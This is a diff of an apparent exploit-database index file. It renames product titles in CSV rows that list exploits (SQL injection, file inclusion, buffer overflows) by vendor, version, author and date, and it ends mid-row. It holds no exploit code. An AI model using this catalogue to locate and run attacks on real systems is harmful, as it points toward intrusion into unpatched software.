30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 @@ -27416,8 +27416,8 @@ id,file,description,date,author,platform,type,port 30445,platforms/php/webapps/30445.txt,"Joomla! Component Tour de France Pool 1.0.1 Module - MosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - Duyuruoku.asp SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps,0 30447,platforms/windows/remote/30447.html,"Tor 0.1.2.15 - ControlPort Missing Authentication Unauthorized Access",2007-08-02,anonymous,windows,remote,0 -30448,platforms/php/webapps/30448.txt,"Lanius CMS 1.2.14 - FAQ Module mid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 -30449,platforms/php/webapps/30449.txt,"Lanius CMS 1.2.14 - EZSHOPINGCART Module cid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 +30448,platforms/php/webapps/30448.txt,"Lanius CMS 1.2.14 FAQ Module - 'mid' Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 +30449,platforms/php/webapps/30449.txt,"Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30450,platforms/php/webapps/30450.txt,"Lanius CMS 1.2.14 GALLERY Module - gid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager - default.asp Multiple SQL Injection",2007-08-03,"Aria-Security Team",asp,webapps,0 30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps,0 @@ -27426,7 +27426,7 @@ id,file,description,date,author,platform,type,port 30455,platforms/windows/dos/30455.txt,"Microsoft Internet Explorer 6 - Position:Relative Denial of Service",2007-08-07,Hamachiya2,windows,dos,0 30456,platforms/php/webapps/30456.txt,"VietPHP - _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30457,platforms/php/webapps/30457.txt,"VietPHP - admin/index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 -30809,platforms/windows/remote/30809.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal",2007-11-26,"Corey Lebleu",windows,remote,0 +30809,platforms/windows/remote/30809.txt,"SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal",2007-11-26,"Corey Lebleu",windows,remote,0 30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - Password Parameter SQL Injection",2007-11-26,JosS,php,webapps,0 30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30462,platforms/windows/dos/30462.py,"Microsoft Windows Media Player 11 - AU Divide-by-Zero Denial of Service",2007-08-08,"A.Sawan and nophie",windows,dos,0 @@ -27497,7 +27497,7 @@ id,file,description,date,author,platform,type,port 30527,platforms/multiple/dos/30527.txt,"Vavoom 1.24 - str.cpp VStr::Resize Function Crafted UDP Packet Remote Denial of Service",2007-08-24,"Luigi Auriemma",multiple,dos,0 30528,platforms/multiple/dos/30528.txt,"Vavoom 1.24 - p_thinker.cpp VThinker::BroadcastPrintf Function Multiple Field Remote Overflow",2007-08-24,"Luigi Auriemma",multiple,dos,0 30529,platforms/multiple/dos/30529.txt,"Media Player Classic 6.4.9 - FLI File Remote Buffer Overflow",2007-08-24,wushi,multiple,dos,0 -30530,platforms/hardware/dos/30530.pl,"Thomson SpeedTouch 2030 - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",hardware,dos,0 +30530,platforms/hardware/dos/30530.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",hardware,dos,0 30531,platforms/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 - 'index.php' Cross-Site Scripting",2007-08-27,d3hydr8,php,webapps,0 30532,platforms/windows/remote/30532.pl,"Motorola Timbuktu Pro 8.6.3.1367 - Directory Traversal",2007-08-27,titon,windows,remote,0 30533,platforms/php/webapps/30533.txt,"Dale Mooney Calendar Events - Viewevent.php SQL Injection",2007-08-27,s0cratex,php,webapps,0 @@ -27647,7 +27647,7 @@ id,file,description,date,author,platform,type,port 30630,platforms/multiple/remote/30630.c,"id Software Doom 3 Engine - Console String Visualization Format String",2007-10-02,"Luigi Auriemma",multiple,remote,0 30631,platforms/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 - IE Parameter Cross-Site Scripting",2007-09-20,Websecurity,multiple,remote,0 30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - 'index.php' Cross-Site Scripting",2007-10-03,Gokhan,php,webapps,0 -30633,platforms/php/webapps/30633.txt,"Uebimiau 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 +30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0 30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 30635,platforms/windows/remote/30635.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 - Recursive DNS Spoofing (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0 @@ -27744,7 +27744,7 @@ id,file,description,date,author,platform,type,port 30806,platforms/php/webapps/30806.txt,"PHPSlideShow 0.9.9 - Directory Parameter Cross-Site Scripting",2007-11-26,"Jose Luis Gongora Fernandez",php,webapps,0 30807,platforms/asp/webapps/30807.txt,"GOUAE DWD Realty - Password Parameters SQL Injection",2007-11-26,"Aria-Security Team",asp,webapps,0 30808,platforms/cgi/webapps/30808.txt,"GWExtranet 3.0 - 'Scp.dll' Multiple HTML Injection Vulnerabilities",2007-11-26,Doz,cgi,webapps,0 -30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 +30723,platforms/hardware/webapps/30723.php,"Seagate BlackArmor NAS - Root Exploit",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30724,platforms/linux/dos/30724.txt,"Perdition 1.17 - IMAPD __STR_VWRITE Remote Format String",2007-10-31,"Bernhard Mueller",linux,dos,0 30725,platforms/hardware/webapps/30725.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 30726,platforms/hardware/webapps/30726.txt,"Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery",2014-01-06,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -27840,7 +27840,7 @@ id,file,description,date,author,platform,type,port 30835,platforms/unix/remote/30835.sh,"Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting",2007-11-30,"Adrian Pastor",unix,remote,0 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - adresses/ratefile.php SQL Injection",2007-11-30,Lostmon,php,webapps,0 30837,platforms/linux/dos/30837.txt,"QEMU 0.9 - Translation Block Local Denial of Service",2007-11-30,TeLeMan,linux,dos,0 -30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filtering",2007-12-01,"Carl Hardwick",multiple,remote,0 +30838,platforms/multiple/remote/30838.html,"Apple Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filtering",2007-12-01,"Carl Hardwick",multiple,remote,0 30839,platforms/linux/local/30839.c,"ZABBIX 1.1.4/1.4.2 - daemon_start Privilege Escalation",2007-12-03,"Bas van Schaik",linux,local,0 30840,platforms/windows/dos/30840.txt,"SonicWALL Global VPN Client 4.0.782 - Remote Format String",2007-12-04,"SEC Consult",windows,dos,0 30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - pages/default.aspx template Variable Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0 @@ -28228,8 +28228,8 @@ id,file,description,date,author,platform,type,port 31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80 -31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 - ABOR Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 -31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 - CWD Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31254,platforms/windows/remote/31254.py,"PCMan FTP Server 2.07 - ABOR Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31255,platforms/windows/remote/31255.py,"PCMan FTP Server 2.07 - CWD Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0 31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0 @@ -28581,7 +28581,7 @@ id,file,description,date,author,platform,type,port 31635,platforms/windows/dos/31635.py,"WinWebMail 3.7.3 - IMAP Login Data Handling Denial Of Service",2008-04-10,ryujin,windows,dos,0 31636,platforms/php/webapps/31636.txt,"W2B PHPHotResources - 'cat.php' SQL Injection",2008-04-11,The-0utl4w,php,webapps,0 31637,platforms/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection",2008-04-11,The-0utl4w,php,webapps,0 -31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x - (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 +31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x -OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0 31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection",2008-04-13,S@BUN,php,webapps,0 31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting",2008-04-14,"Sebastien gioria",java,webapps,0 @@ -28595,7 +28595,7 @@ id,file,description,date,author,platform,type,port 31650,platforms/asp/webapps/31650.txt,"Cezanne Software 6.5.1/7 - 'CFLogon.asp' Cross-Site Scripting",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31651,platforms/php/webapps/31651.txt,"amfPHP 1.2 - browser/methodTable.php class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31652,platforms/php/webapps/31652.txt,"amfPHP 1.2 - browser/code.php Multiple Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 -31653,platforms/php/webapps/31653.txt,"amfphp 1.2 - browser/details class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 +31653,platforms/php/webapps/31653.txt,"amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting",2008-04-15,"Alberto Cuesta Partida",php,webapps,0 31654,platforms/php/webapps/31654.txt,"W2B Online Banking - 'ilang' Parameter Remote File Inclusion",2008-04-15,THuM4N,php,webapps,0 31655,platforms/php/webapps/31655.txt,"Istant-Replay - 'read.php' Remote File Inclusion",2008-04-15,THuGM4N,php,webapps,0 31656,platforms/windows/dos/31656.txt,"ICQ 6 - 'Personal Status Manager' Remote Buffer Overflow",2008-04-16,"Leon Juranic",windows,dos,0 @@ -28722,7 +28722,7 @@ id,file,description,date,author,platform,type,port 31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 - 'AccesCodeStart.asp' Cross-Site Scripting",2008-05-13,"Brad Antoniewicz",asp,webapps,0 31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal - 'linking.page.php' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - GetHttpResponse() MITM Remote Code Execution",2014-02-20,"Julien Ahrens",windows,remote,0 -31789,platforms/windows/remote/31789.py,"PCMAN FTP 2.07 - Buffer Overflow",2014-02-20,Sumit,windows,remote,21 +31789,platforms/windows/remote/31789.py,"PCMan FTP Server 2.07 - Buffer Overflow",2014-02-20,Sumit,windows,remote,21 31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555 31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80 @@ -28747,7 +28747,7 @@ id,file,description,date,author,platform,type,port 31811,platforms/asp/webapps/31811.txt,"Site Tanitimlari Scripti - Multiple SQL Injections",2008-05-20,"fahn zichler",asp,webapps,0 31812,platforms/asp/webapps/31812.txt,"DizaynPlus Nobetci Eczane Takip 1.0 - 'ayrinti.asp' Parameter SQL Injection",2008-05-20,U238,asp,webapps,0 31813,platforms/php/webapps/31813.txt,"eCMS 0.4.2 - Multiple Security Vulnerabilities",2008-05-20,hadihadi,php,webapps,0 -31814,platforms/windows/remote/31814.py,"Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit",2014-02-22,"OJ Reeves",windows,remote,0 +31814,platforms/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit",2014-02-22,"OJ Reeves",windows,remote,0 31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0 31816,platforms/java/webapps/31816.txt,"SAP Web Application Server 7.0 - '/sap/bc/gui/sap/its/webgui/' Cross-Site Scripting",2008-05-21,DSecRG,java,webapps,0 31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0 @@ -28768,7 +28768,7 @@ id,file,description,date,author,platform,type,port 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 31834,platforms/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - (clicktracker.php track Parameter) SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 -31835,platforms/php/webapps/31835.txt,"SAFARI Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 +31835,platforms/php/webapps/31835.txt,"Apple Safari Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 31836,platforms/php/webapps/31836.txt,"WordPress Plugin Upload File - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection",2008-05-24,"Ali Jasbi",php,webapps,0 31838,platforms/php/webapps/31838.txt,"Horde Multiple Product - workweek.php Timestamp Parameter Cross-Site Scripting",2008-05-24,"Ivan Sanchez",php,webapps,0 @@ -28822,7 +28822,7 @@ id,file,description,date,author,platform,type,port 31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - /vdesk/admincon/index.php sql_matchscope Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal",2008-06-06,"Tan Chew Keong",linux,remote,0 31888,platforms/php/webapps/31888.txt,"SchoolCenter 7.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps,0 -31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 - Client Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0 +31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0 31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",multiple,remote,0 31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 - 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0 31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Parameter Cross-Site Scripting",2008-06-10,Unohope,cgi,webapps,0 @@ -29066,12 +29066,12 @@ id,file,description,date,author,platform,type,port 32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0 32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0 32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0 -32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System - (MRBS) 1.2.6 day.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 -32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System - (MRBS) 1.2.6 week.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 -32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System - (MRBS) 1.2.6 month.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 -32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System - (MRBS) 1.2.6 report.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 -32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System - (MRBS) 1.2.6 help.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 +32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Inclusion",2008-08-04,"Sina Yazdanmehr",php,webapps,0 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0 32152,platforms/windows/local/32152.py,"KMPlayer 3.8.0.117 - Buffer Overflow",2014-03-10,metacom,windows,local,0 @@ -29128,7 +29128,7 @@ id,file,description,date,author,platform,type,port 32205,platforms/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Privilege Escalation",2014-03-12,LiquidWorm,windows,local,0 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 -32208,platforms/multiple/dos/32208.txt,"Oracle VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0 +32208,platforms/multiple/dos/32208.txt,"Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0 32209,platforms/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 - BKHOdeq.exe Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20171 32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20111 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80 @@ -29286,9 +29286,9 @@ id,file,description,date,author,platform,type,port 32420,platforms/windows/dos/32420.c,"Mass Downloader - Malformed Executable Denial Of Service",2008-09-25,Ciph3r,windows,dos,0 32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0 -32423,platforms/jsp/webapps/32423.txt,"OpenNms 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 -32424,platforms/jsp/webapps/32424.txt,"OpenNms 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 -32425,platforms/jsp/webapps/32425.txt,"OpenNms 1.5.x - event/list filter Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 +32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 +32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 +32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting",2008-09-25,d2d,jsp,webapps,0 32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 - Remote Stack Buffer Overflow",2008-09-26,"Ruben Santamarta ",windows,remote,0 32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 - 'LSTable.php' Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0 32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 - HTTP Proxy Remote Denial of Service",2008-09-26,quakerdoomer,windows,dos,0 @@ -29320,7 +29320,7 @@ id,file,description,date,author,platform,type,port 32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0 32456,platforms/windows/remote/32456.txt,"RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Command Directory Traversal",2008-10-03,dmnt,windows,remote,0 32457,platforms/windows/remote/32457.txt,"XAMPP for Windows 1.6.8 - 'cds.php' SQL Injection",2008-10-03,"Jaykishan Nirmal",windows,remote,0 -32458,platforms/multiple/remote/32458.txt,"OpenNms 1.5.x - HTTP Response Splitting",2008-10-05,"BugSec LTD",multiple,remote,0 +32458,platforms/multiple/remote/32458.txt,"OpenNMS 1.5.x - HTTP Response Splitting",2008-10-05,"BugSec LTD",multiple,remote,0 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0 32460,platforms/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 - 'Phonebook.php' SQL Injection",2008-10-06,"Jaykishan Nirmal",windows,remote,0 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0 @@ -29390,7 +29390,7 @@ id,file,description,date,author,platform,type,port 32527,platforms/php/webapps/32527.txt,"Adam Wright HTMLTidy 0.5 - 'html-tidy-logic.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps,0 32528,platforms/php/webapps/32528.txt,"iPeGuestbook 1.7/2.0 - 'pg' Parameter Cross-Site Scripting",2008-10-24,"Ghost Hacker",php,webapps,0 32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution",2008-10-25,"Varun Srivastava",multiple,remote,0 -32530,platforms/linux/remote/32530.txt,"Lynx 2.8 - '.mailcap' and '.mime.type' Files Local Code Execution",2008-11-03,"Piotr Engelking",linux,remote,0 +32530,platforms/linux/remote/32530.txt,"Lynx 2.8 - '.mailcap'/'.mime.type' Local Code Execution",2008-11-03,"Piotr Engelking",linux,remote,0 32531,platforms/php/webapps/32531.txt,"phpMyAdmin 3.0.1 - 'pmd_pdf.php' Cross-Site Scripting",2008-10-27,"Hadi Kiamarsi",php,webapps,0 32532,platforms/php/webapps/32532.txt,"bcoos 1.0.13 - 'include/common.php' Remote File Inclusion",2008-10-27,Cru3l.b0y,php,webapps,0 32533,platforms/php/webapps/32533.txt,"Tandis CMS 2.5 - 'index.php' Multiple SQL Injection",2008-10-27,G4N0K,php,webapps,0 @@ -29433,7 +29433,7 @@ id,file,description,date,author,platform,type,port 32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0 32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service",2008-11-09,killprog.org,windows,dos,0 32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",java,webapps,0 -32575,platforms/php/webapps/32575.txt,"Zeeways SHAADICLONE 2.0 - 'admin/home.php' Authentication Bypass",2008-11-08,G4N0K,php,webapps,0 +32575,platforms/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass",2008-11-08,G4N0K,php,webapps,0 32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0 32577,platforms/asp/webapps/32577.txt,"Dizi Portali - 'film.asp' SQL Injection",2008-11-10,"Kaan KAMIS",asp,webapps,0 32578,platforms/windows/remote/32578.py,"Yosemite Backup 8.70 - 'DtbClsLogin()' Remote Buffer Overflow",2008-11-11,"Abdul-Aziz Hariri",windows,remote,0 @@ -29455,7 +29455,7 @@ id,file,description,date,author,platform,type,port 32594,platforms/php/webapps/32594.txt,"Easyedit CMS - news.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 32595,platforms/php/webapps/32595.txt,"Softbiz Classifieds Script - Cross-Site Scripting",2008-11-20,"Vahid Ezraeil",php,webapps,0 32596,platforms/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial Of Service",2008-11-20,"Christian Hoffmann",multiple,dos,0 -32597,platforms/php/webapps/32597.txt,"Pilot Group PG Roommate - SQL Injection",2008-11-23,ZoRLu,php,webapps,0 +32597,platforms/php/webapps/32597.txt,"Pilot Group PG Roommate Finder Solution - SQL Injection",2008-11-23,ZoRLu,php,webapps,0 32598,platforms/php/webapps/32598.txt,"COms - 'dynamic.php' Cross-Site Scripting",2008-11-24,Pouya_Server,php,webapps,0 32599,platforms/hardware/remote/32599.txt,"Linksys WRT160N - 'apply.cgi' Cross-Site Scripting",2008-11-27,"David Gil",hardware,remote,0 32600,platforms/php/webapps/32600.txt,"AssoCIateD 1.4.4 - 'menu' Parameter Cross-Site Scripting",2008-11-27,"CWH Underground",php,webapps,0 @@ -29595,7 +29595,7 @@ id,file,description,date,author,platform,type,port 32741,platforms/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - search.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 32742,platforms/jsp/webapps/32742.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - swr.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red 